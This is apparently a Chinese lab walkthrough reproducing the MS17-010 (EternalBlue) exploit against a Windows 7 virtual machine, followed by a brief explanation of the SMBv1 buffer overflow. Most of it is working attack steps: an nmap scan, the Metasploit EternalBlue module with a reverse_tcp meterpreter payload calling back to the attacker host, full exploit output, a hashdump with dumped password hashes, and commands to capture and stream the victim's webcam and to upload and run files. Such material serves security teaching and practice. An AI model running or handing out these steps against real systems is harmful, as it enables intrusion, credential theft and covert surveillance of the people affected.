MS17-010(永恒之蓝)漏洞复现
#收集同网段主机信息
nmap 192.168.80.0/24 -sS -sV
Nmap scan report for 192.168.80.128
Host is up (0.00020s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
554/tcp open rtsp?
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:81:14:B7 (VMware)
Service Info: Host: CLIENT-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (5 hosts up) scanned in 152.09 seconds
#可以看到445端口开启,尝试使用ms17-010进行渗透测试。
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.80.128
run
#主机是Windows7,存在永恒之蓝漏洞,使用攻击模块进行攻击
[+] 192.168.80.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
use exploit/windows/smb/ms17_010_eternalblue
set set rhosts 192.168.80.128
set payload windows/x64/meterpreter/reverse_tcp
run
[*] Started reverse TCP handler on 192.168.80.131:4444
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.80.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.80.128:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.80.128:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.80.128
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.128:57413) at 2023-06-18 10:40:09 -0400
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
#攻击成功
screenshot #截屏
getuid #获知系统权限
hashdump #获取系统md5加密密码(如“aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::”=“12345678”)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1003:aad3b435b51404eeaad3b435b51404ee:b00ed0d8b185f96414dab094a2314a7e:::
webcam_list #查看摄像头
webcam_snap #摄像头拍照
webcam_stream #摄像头即时观看
upload #上传文件
download #下载文件
edit #编辑文件
search #搜索文件
execute #执行文件
shutdown #关闭肉鸡
漏洞原理:
漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。然后会进行如下操作:
1.srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
2.因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出。
